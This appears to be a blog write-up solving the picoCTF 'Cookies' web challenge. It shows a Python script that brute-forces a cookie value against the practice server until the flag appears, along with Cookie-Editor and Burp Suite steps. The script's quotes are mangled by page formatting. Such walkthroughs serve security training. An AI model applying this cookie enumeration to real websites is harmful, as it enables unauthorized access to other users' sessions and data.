Cookies

March 13, 2025

Problem Description

Who doesn’t love cookies? Try to figure out the best one. http://mercury.picoctf.net:27177/

Tools Used

  • Cookie-Editor Extension
  • Python script
  • Burp Suite

Solution Steps

  1. Inspecting the page
    if search with the placeholder snickerdoodle we get this response

    Local Authority Image 1
    let’s see the cookie editor extension
    Local Authority Image 1
    let’s try to change the cookie value to a random number like 5 and see what happens
    Local Authority Image 1
    so by changing the cookie value we get different cookie names

  2. How to get the cookie value of the flag
    let’s see the request passed

    Local Authority Image 1
    Local Authority Image 1

    So this is the request and response so I can make a python script to brute force the cookie value until the header of the picoCTF flag picoCTF{

  3. The python script
    First of all let’s see the maximum cookie value. After few tries I found that the maximum value is 28 so let’s start typing the script.

import requests import re

url = “http://mercury.picoctf.net:27177/check"

headers = { “User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64)”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9”, “Referer”: “http://mercury.picoctf.net:27177/", }

for i in range(1, 29):
cookies = {“name”: str(i)}

response = requests.get(url, headers=headers, cookies=cookies)
match = re.search(r"picoCTF\{.*?\}", response.text)

if "picoCTF{" in response.text:
    print(f"🎉 Flag found! Cookie value: {i}")
    print(match.group(0))
    break
else:
    print(f"Tried cookie value: {i} - No flag found.")

1
2
3
4
5
6
7


First from the request we captured by burp let's put it then try to extract the flag by regex expression.




---

Tags:

Categories: